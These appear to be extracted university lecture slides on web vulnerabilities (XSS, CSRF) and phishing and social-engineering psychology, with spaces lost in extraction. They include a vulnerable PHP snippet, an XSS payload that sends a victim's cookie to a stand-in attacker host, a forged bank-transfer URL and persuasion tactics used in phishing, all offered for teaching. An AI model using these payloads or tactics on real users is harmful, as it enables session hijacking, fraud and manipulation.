Upload
vutram
View
215
Download
3
Embed Size (px)
Citation preview
NetworkSecurityAA2015/2016
Vulnerabilities(b)Dr.LucaAllodi
Dr.LucaAllodi- NetworkSecurity- UniversityofTrento,DISI(AA2015/2016)
1
Cross-site-scripting(XSS)
• Amongthemostcommonifnotperhapsthemostcommonweb-basedattack
• Byexploitingthisvulnerability,theattackercanmodifythecontentdeliveredtoauser’sbrowser
• Thevulnerabilityisontheserver,buttheattackaffectstheuser
Dr.LucaAllodi- NetworkSecurity- UniversityofTrento,DISI(AA2015/2016) 2
StatsfromNVD(Feb2016)
XSSattacks
• Regardlessofexecution,arebasedontheimplicitnotionoftrustthatexistsbetweenabrowserandaserver
• Thebrowserexecuteswhateverthecontactedwebsitesays• “Same-origin-policy”
• Appliedalsotobrowsercookies,JSexecution,etc.
• Vulnerabilityallowstheattackertoinjectcontentonawebpage
• Whenvictimbrowserloadswebpageitexecutesinjectedcontent
• Thebrowsercannotdistinguishbetweenlegitimateand”malicious”instructionsà allcomingfromatrustedsource
Dr.LucaAllodi- NetworkSecurity- UniversityofTrento,DISI(AA2015/2016) 3
StoredXSS(PersistentXSS)
• ThisXSSvariantisstoredontheremoteserver• E.g.aforumthread,anewsletter,adatabase
• Wheneverauserretrievesacertainwebpage,themaliciouscontentisdeliveredtotheirbrowser
Dr.LucaAllodi- NetworkSecurity- UniversityofTrento,DISI(AA2015/2016) 4
1.Injectionattack
Theserverstoresthecraftedinstructionsfromtheattackeranddeliversthemtousersthataskforthecontentwheretheattackisstored
ReflectedXSS(Non-persistent)
• Theattackersomehowtrickstheuserinsendingtheforgedinputtotheserver
• e.g.sendsalinkwithaspamemail
Dr.LucaAllodi- NetworkSecurity- UniversityofTrento,DISI(AA2015/2016) 5
1.Attackersendscraftedlinktouser
2.Userclickslinkansendsrequesttoserver
3.Serverreplieswithmaliciouscontent
ReflectedXSSexample
Webpagecode:<?php $name=$_GET['name'];echo"Welcome$name<br>";echo"<ahref="http://legit-site.com/">ClicktoDownload</a>";?>Attackersendsthisurl tovictim:index.php?name=guest<script>alert('attacked')</script>SessionHijack:<ahref=#onclick=\"document.location=\'http://attacker-site.com/xss.php?c=\'+escape\(document.cookie\)\;\">ClicktoDownload</a>
Dr.LucaAllodi- NetworkSecurity- UniversityofTrento,DISI(AA2015/2016) 6
XSS- impacts
• disclosureoftheuser’ssessioncookie,• Canbeusedtohijackuser’ssession
• disclosureofenduserfiles• redirecttheusertosomeotherpageorsite
• E.g.controlledbytheattacker• Possibleotherattackvectorsstoredonthatpage
• modifywebpagecontent/information• e.g.modifybuttonfunctionalities
• ..
Dr.LucaAllodi- NetworkSecurity- UniversityofTrento,DISI(AA2015/2016) 7
Cross-siterequestforgery
• SimilarinprincipletoanXSSattack• Ratherthanexploitingthebrowser’strustonserverreplies,itexploitsserver’strustonbrowserrequests
• Attackhappensontheserverà server“changestate”• e.g.executesserver-sideoperationnotintendedbyuser
Dr.LucaAllodi- NetworkSecurity- UniversityofTrento,DISI(AA2015/2016) 8
StatsfromNVD(Feb2016)
CSRF
• Forgedinputtoserverexecutesactionsontheserverà changesserverstatus
• Usuallyexploitsauser’sstoredcredentialstoexecuteillegitimateactionsonawebsite
• Changeemail/password• Performserveroperations(e.g.banktransfer)
• Example(https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF))• ImagineawebbankthatoperatesthroughHTTPGETarguments
• GEThttp://bank.com/transfer.do?acct=BOB&amount=100HTTP/1.1
• Attackercantricktheuserinsendingforgedrequest• http://bank.com/transfer.do?acct=MARIA&amount=100000• e.g.embedlinkinHTMLsourcecode
Dr.LucaAllodi- NetworkSecurity- UniversityofTrento,DISI(AA2015/2016) 9
Commonsourceofvulnerability
• SQLinjectionà SQLbackendtrustsunsanitizedinput
• Bufferoverflowà Systemcannotdistinguishbetweeninstructionsanddata,truststheinputtobecorrect
• XSSà thebrowsertruststhecontentsentbytheserver
• CSRFà theservertrustsandexecutesthecommandssentbythebrowser
Dr.LucaAllodi- NetworkSecurity- UniversityofTrento,DISI(AA2015/2016) 10
Humanvulnerabilities
“Thebiggestthreattothesecurityofacompanyisnotacomputervirus,anunpatchedholeinakeyprogramorabadlyinstalledfirewall.Infact,thebiggestthreatcouldbeyou.WhatIfoundpersonallytobetruewasthatit’seasiertomanipulate peopleratherthantechnology.Mostofthetimeorganizations overlookthathumanelement”
KevinMitnick
Dr.LucaAllodi- NetworkSecurity- UniversityofTrento,DISI(AA2015/2016) 11
Phishing
• Theattackeraimsatobtainingthecredentialsofusersofawebsite/service
• othertypesofprivateinformationcanbegatheredtoo• Typicallythroughmoresophisticated“spearphishing”attacks
• Attackercreatesareplica oftheoriginalwebsite• Replicaispublishedonline• Linktypicallysentthroughspamemails,socialnetworks• Recipientmaybefooledinopeningthelinkandenteringtheircredentialsasinthegenuinewebsite
• Credentialsareofcoursesenttotheattackerinstead
Dr.LucaAllodi- NetworkSecurity- UniversityofTrento,DISI(AA2015/2016) 12
Phishing– attackertools
• Creatingaworkingreplicaofawebsiteisonlyashardascreatingacopy
• Attackerneedstomodifysomeofitscomponents• e.g.sendformHTTPPOSTtoawebservertheattackercontrols
• AdvancedattackersmayremoveJS/thirdpartycomponentstopreventexposingthephishingwebsite
• Advancedattackersvsscriptkiddies
• Automatedtoolsexistthatdothisfortheattacker• Fewhundredsofdollarsonblackmarkets• Essentiallyarecursivewget
Dr.LucaAllodi- NetworkSecurity- UniversityofTrento,DISI(AA2015/2016) 13
Phishingexample
Translation(including Englishreproductionoflexicalandgrammaticalerrors).
Warning:Wenoticedsomethingunusualinarecentemailaccountsign-in.Tohelpmaintaining secure,werequestedachallengehighersecurity.clickthelink{link}, Wekindly asktoreviewyouractivitiesrecentandwewillhelpyoutakingcorrectingmeasures.
Combiningphishingandsoftwarevulnerabilities
• Inthiscaseit’seasytonoticethatthedomainI’mredirectedtoisnotUniTn’s
• However,thereexistvulnerabilitiesinbrowsersthatallowthemaliciouswebsitetospooftheaddressdisplayedintheaddressbar
• Example:• Thewebpageisgfcv-altervista.org• Thebrowsersaysit’swebmail.disi.unitn.it
Exampleofaddressspoofing
• Safari8vulnerabilityunderOSX<10.10.5• PoC →http://www.deusen.co.uk/items/iwhere.9500182225526788/
• OthersimilarvulnerabilitiesexistforIEandChrome
• Ifbrowserisvulnerable,attackercanmanipulateaddressbar’scontenttohis/herliking
Socialengineering
• Phishingisonlyanapplicationofawidersetofattacksthatexploithumannatureto(usually)breachdataconfidentiality
• “Socialengineering”identifiesasetoftechniquesthatattackweaknessesinhumanpsychology
• Thefinalgoalistopersuadeahumanbeing inperformingactionselicitedbytheattacker
• Situationaltheoryofpublicsà whypeoplewouldtakeaction,orfeelpartofacollective
• Problemrecognitionà subjectthinkstheproblemisrelevanttothem
• Activeinvolvementà subjectthinkstheywillsuffertheconsequencesofthethreat
• Constraintrecognitionàsubjectthinkstheiractionsarelimitedbyfactorsoutsideoftheircontrol
Dr.LucaAllodi- NetworkSecurity- UniversityofTrento,DISI(AA2015/2016) 18
ElaborationLikelihoodModel(ELM)• ELMdescribesthewayshumanschangetheirattitudesordecidetoperformactionstheywouldnotperformwithoutexternalstimuli
• Tworoutesto“persuasion”• Centralroute
• Stimuliareweightedbythesubjectandfinaldecisioniscarefullyelaborated
• Highamountofcognitiveeffort• Associatedwith“rationalperfectlyinformeddecisions”ineconomics
• Persuasionhappensthroughcarfulelaborationofinformation• Peripheralroute
• Communicationthattypicallydoesnotresultincarefulcognitiveeffortinunderstandingthemessage
• Subjectisconvincedbyunder-analyzingapparentlyrelevant“cues”thatareinrealityunrelatedtothesubjectmatter
• Persuasionhappensthrough”adjunctelements”tothecommunication• Likeabilityofsubject,physicalattractiveness,trust,…
Dr.LucaAllodi- NetworkSecurity- UniversityofTrento,DISI(AA2015/2016) 19
Usesoftheperipheralroute
• Vastlyusedasa“cheap”routetoconvincepeopletoperformanaction
• Buyaproduct• Subscribetoaservice• Visitalocation• …
• Especiallyeffectivewhenphysicalcontactisnotafactor• Marketingstrategiesoftenrelyonthismechanisms
• TVadmustconvinceyoutobuyashampooin30seconds• Socialengineeringdiffersfrommarketinginthatattackstypicallydonottrytosellproducts
• Rather,socialengineersmustpersuade victimstodisclosesensitiveorprivateinformation
Dr.LucaAllodi- NetworkSecurity- UniversityofTrento,DISI(AA2015/2016) 20
Hackingahuman
• Sixfactorsaffectlikelihoodofhumanpersuasion1. Reciprocation
• Subjectsformimpliedorexplicitobligationstowardseachotherà Normativecommitment
2. Consistency• Subjectstendtobeconsistentwithpreviousdecisions,evenifallevidence
showsthatthesewerebad decisionsà Continuancecommitment3. Socialproof
• Subjectstendtoactsimilarlytotheirpeersto“fitin”à Affectivecommitment4. Likeability
• Subjectstendtotrustpeopletheylike,findconvincing,orattractive5. Authority
• Subjectsfear punishment(thatanauthoritycanimpose)andwillcomply6. Scarcity
• Subjectswillreact quicklyandpossiblyirrationallytostimuliwhentheybelievethattheirfreedomofchoiceisafunctionoftimeorresourceavailability
Dr.LucaAllodi- NetworkSecurity- UniversityofTrento,DISI(AA2015/2016) 21
Normativecommitment
• Subjectswillperformanactionbecausethat’scustomaryormandatedbylaworcontract
• Basedonthenotionofreciprocationofbenefits• Whensubjectsreceivessomethingtheyvalue,theyfeel“cognitivedissonance”
• Essentiallya“bug”ofhumanpsychology• Facedwhensubjectmustelaboratetwocontrastingforcesorinputs
simultaneously• Subjectmustelaborateevidence incontrasttohispreviousbeliefs• E.g.“Idonotneedsuncream”à “here isatesterforyou”à “thankyouI
shouldprobablybuysome”
• Promisescountas“somethingofvalue”• Ipromiseyouavaluablegoodatthesolecostofshipping
• Peopletendtocomplybecausetheyfeel“gratitude”fortheunsolicitedproposal
Dr.LucaAllodi- NetworkSecurity- UniversityofTrento,DISI(AA2015/2016) 22
Continuancecommitment
• Subjectstendtomaintaincongruenceintheirattitudesanddecisionseveninpresenceofevidencethatthesearebad
• Subjectstendtomaintaincognitiveconsonanceasopposedtofacecognitivedissonance
• Ineconomicsthisisreflectedintheconceptof“lossaversionandsunkcosts”
• Ifaninitialinvestmentwasbad,peoplewilltendtokeeponinvestingbecausetheyareconvinceditwilleventuallypay-off
• Pay(small)escalatingcoststowinateddy-bear
• Upfrontcostsareloww.r.t promisedbenefitvscostoftakingprecautions(oropportunitycosts)
• Peoplearewillingtogiveawaypersonalinformationfornegligiblebenefitsordiscounts(eveniftheyclaimtheyarewillingtopayapremiumtopreservetheirprivacy)[Acquisti 2003]
Dr.LucaAllodi- NetworkSecurity- UniversityofTrento,DISI(AA2015/2016) 23
Affectivecommitment
• Peopleareinfluencedbytheopinionofthosetheyesteemorlike
• Decisionofactiontakentobepartofacliqueoracircleofpeers
• Widelyusedformarketingtoo• Emotionalbondwithinterlocutorcanbeexploitedtohavethevictimcommunicatepersonaldetailsorperformcertainactions
• e.g.pretendyouareonavacationwithafriendofthevictimandaskmoneytosolveanemergency
• Socialnetworksmaketheseinferencespossiblefortheattacker
Dr.LucaAllodi- NetworkSecurity- UniversityofTrento,DISI(AA2015/2016) 24
LikingandTrust
• Similarlytoaffectivecommitment,peoplearewillingtobelikedbythosewhomthelike
• Takeactiontoobtainconsentfromthosetheylike• Peopletendtoextend“credibility”ofsubjectstheyperceiveassuccessfulbeyondthereasonableboundariesofthesesubjects’actualexpertise
• e.g.famousactorthatpublicizesbiscuitsdespitehavingnoactualexpertiseorcredibilityasabaker,butonlyasanactor
• Whenphysical/presenceattractionisnotafactor(e.g.emailexchange),thelikeabilitycanemergefroma“friendlyconnection”
• e.g.appealorelicitcommontraits
Dr.LucaAllodi- NetworkSecurity- UniversityofTrento,DISI(AA2015/2016) 25
Authority
• Peopletendtorespondtoauthorityespeciallywheninfearoftheoutcomesofnottakingaction
• E.g.Punishmentorthecancellationofaprivilege• “Youremailaccountisgoingtobedeletedifyourpasswordisnotconfirmed.”
• Obediencetoauthorityisaverypowerfultooltopersuadepeopleinpertainingactionsorbehaviors
• Insome(occasionallyverycontroversial)casespeoplewillobeytoauthorityevenagainstwell-establishedmoralvaluesandethics
Dr.LucaAllodi- NetworkSecurity- UniversityofTrento,DISI(AA2015/2016) 26
Effectsofauthority– Milgram’sexperiment• Experimentinthe1960s@Yale,replicatedseveraltimes• SubjectAdeceivedinparticipatinginanexperimentwheretheyhadto“teach”subjectBcombinationsofEnglishterms
• SubjectBisinrealityacollaboratoroftheexperimenter• WheneversubjectBgivesthewronganswer,subjectAmustinflictanelectrical
shocktoB• Voltageincreaseswithnumberoferrors• NovisualcontactbetweenAandB,butAcanhearBscreaminginpainfortheshock• Thereisnoactualshock, butAdoesnotknow
• TowhatextentwillAcollaborate?• 65%ofsubjectAswentallthewaytohighestshocklevel(whenBeffectively
stoppedanswering)• SubjectAsfeltdeeplyconcernedandstressed,expressedprofoundanxiety,
hadhystericalreactions• Yet,theexperimenter’s(authority)powerwasenoughtopushthemin
continuingwiththeexperimentinmostcases1. “Pleasecontinue.”2. “Theexperimentrequiresthatyoucontinue.”3. “Itisabsolutelyessentialthatyoucontinue.”4. “Youhavenootherchoice,youmustgoon.”
Dr.LucaAllodi- NetworkSecurity- UniversityofTrento,DISI(AA2015/2016) 27
Scarcity
• Similarlytofear,scarcityleadspeopletotakequick,potentiallyuninformeddecisionsinfearoflosinganopportunitythatwilleitherdisappearintimeorthatisscarceinquantity
• Canbeusedbysocialengineerstoelicitunwisedecisionsfromthevictims
• Threatenthatifnodecisionistakenquickly,theopportunitymayfadeaway
• Attackersposesa“constraint”inthefreedomofchoiceofthevictim
Dr.LucaAllodi- NetworkSecurity- UniversityofTrento,DISI(AA2015/2016) 28
Socialengineeringsteps
• Candistinguishbetweensingleandmultiple-stagesocialengineeringattacks
• Singlestageattacksusuallyaimatcollectingsensitiveinformationabout“general”targets
• Nospecificityintheattack• e.g.attackallcostumersofmybank.com
Dr.LucaAllodi- NetworkSecurity- UniversityofTrento,DISI(AA2015/2016) 29
Two(multiple)stageattacks
• Two-stageattacksinvolveaninitialreconnaissancethatgathersinformationneededforsecondstage
• Usedtoincreasecredibilityofattack• E.g.properlegalreferences,employeenames,correctsetofusersinCCto
phishingemail,etc• Spearphishing againstCEO/director/manager/personofinterest
Dr.LucaAllodi- NetworkSecurity- UniversityofTrento,DISI(AA2015/2016) 30
Stepsindetail(firststage)Pattern Phase Typical Activities Pattern Interactions
1. Research and Open Source Intelligence
• Search for opensource intelligence • Establish attack objectives • Identify opportune targets
1.1 Attacker researches and strategizes about potential targets and specific objectives.
2. Planning and Preparation
• Develop attack strategy including means to avoid detection and mitigation by UIT organization• Prepare phishing attack artifacts
2.1 Attacker plans phishing attack and creates phishing artifacts (e.g., phishing email, mobile text message, phony website, malware to be implanted).
3. Phishing Operation • Release phishing artifact via email, cellphone, rogue website, or other means • Wait for a response
3.1 Attacker initiates phishing attack through email, cellphone, rogue website, or other means.
4. Response and Information Capture
•Gain access and/or privileges to obtain greater information reach •Implant malware to achieve information objectives •Identify other opportune UIT targets and internal system information, and capture guarded and sensitive information
4.1 One or more targets unwittingly respond to phishing artifact and become a UIT. 4.2 Attacker detects or is alerted to UIT response and obtains initial information directly from UIT data entry. 4.3 Attacker implants malware on victim’s machine or network. 4.4 Attacker obtains desired information via malware.
Dr.LucaAllodi- NetworkSecurity- UniversityofTrento,DISI(AA2015/2016) 31
Unintentional InsiderThreats:SocialEngineering.CERTInsiderThreatCenter.January 2014http://resources.sei.cmu.edu/library/asset-view.cfm?assetID=77455
Stepsindetail(secondstage)Pattern Phase Typical Activities Pattern Interactions
5. Re-planning and Preparation
•Re-plan attack strategy including means to avoid detection and mitigation by UIT organization •Prepare spear phishing attack artifacts
5.1 Attacker uses information capture in Step 4 above to replan follow-on steps for spear phishing attack. This may entail creation of new artifacts or specific attack approaches.
6. Spear Phishing Operation
• Execute spear-phishing • Wait for a response 6.1 Attacker initiates spear phishing attack.
7. Response and Information Capture
•Gain access and/or privileges to obtain greater information reach •Exploit more specific insider targets: financial system, secure systems, etc.
7.1 One or more high-value targets unwittingly responds to the spear phishing artifact and becomes a UIT. 7.2 Phisher detects or is alerted to UIT response and obtains desired information directly from UIT data entry.
8. Attack Culmination and Exploitation
• Use captured information to directly attack UIT or UIT’s organization to steal, manipulate, and/or destroy targeted assets
8.1 Attacker uses desired information in direct attack on UIT or UIT’s organization to steal, manipulate, and/or destroy targeted assets.
Dr.LucaAllodi- NetworkSecurity- UniversityofTrento,DISI(AA2015/2016) 32
Unintentional InsiderThreats:SocialEngineering.CERTInsiderThreatCenter.January 2014http://resources.sei.cmu.edu/library/asset-view.cfm?assetID=77455
Example:wellengineered,2-stagesocialengineeringattack• On19th ofMay2015Ireceivedanemailfromsomebodyattachinga“receipt”.TheemailwasingoodItalian,andhadseeminglymeaningfullawreferencesregulatingtheemissionofthereceipt
• However,Iwasnotexpectingareceipt• Idiscardeditrightawayasanattackà trashed
• Thenextday,Ireceivethis email:
Dr.LucaAllodi- NetworkSecurity- UniversityofTrento,DISI(AA2015/2016) 33
Dearcostumer,Wekindlyask youtoignorethepreviousreceiptandsubstituteitwiththepresent,dated24/03/2015 ThereceiptmustbeprintedandarchivedbythereceivingsubjectasprescribedbyDRP607/40andsubsequentchanges, andbyRMno.450217,emittedon30/07/1990
Bestregards,Jarvis Bernard
continuancecommitment(variationof)
authority
normativecommitment
Almostfellforit..
Dr.LucaAllodi- NetworkSecurity- UniversityofTrento,DISI(AA2015/2016) 34Reportedresultsareforattachmentoffirstemail.Secondattachmentgavesameresults.
ReadingList• Arora,Ashish,etal."Impactofvulnerabilitydisclosureandpatchavailability-anempiricalanalysis."ThirdWorkshopontheEconomicsofInformationSecurity.Vol.24.2004.
• Miller,Charlie."Thelegitimatevulnerabilitymarket:Insidethesecretiveworldof0-dayexploitsales."InSixthWorkshopontheEconomicsofInformationSecurity.2007.
• http://phrack.org/issues/49/14.html• OWASPresources• Moore,Tyler,andRichardClayton."AnEmpiricalAnalysisoftheCurrentStateofPhishing AttackandDefence."WEIS.2007.
• Workman,Michael."Wisecrackers:Atheory-grounded investigationofphishingandpretextsocialengineering threatstoinformation security."JournaloftheAmericanSocietyforInformationScienceandTechnology 59.4(2008):662-674.
• Acquisti,Alessandro,andJensGrossklags."Losses,gains,andhyperbolicdiscounting: Anexperimentalapproachtoinformationsecurityattitudesandbehavior."2ndAnnualWorkshoponEconomicsandInformationSecurity-WEIS.Vol.3.2003.
Dr.LucaAllodi- NetworkSecurity- UniversityofTrento,DISI(AA2015/2016) 35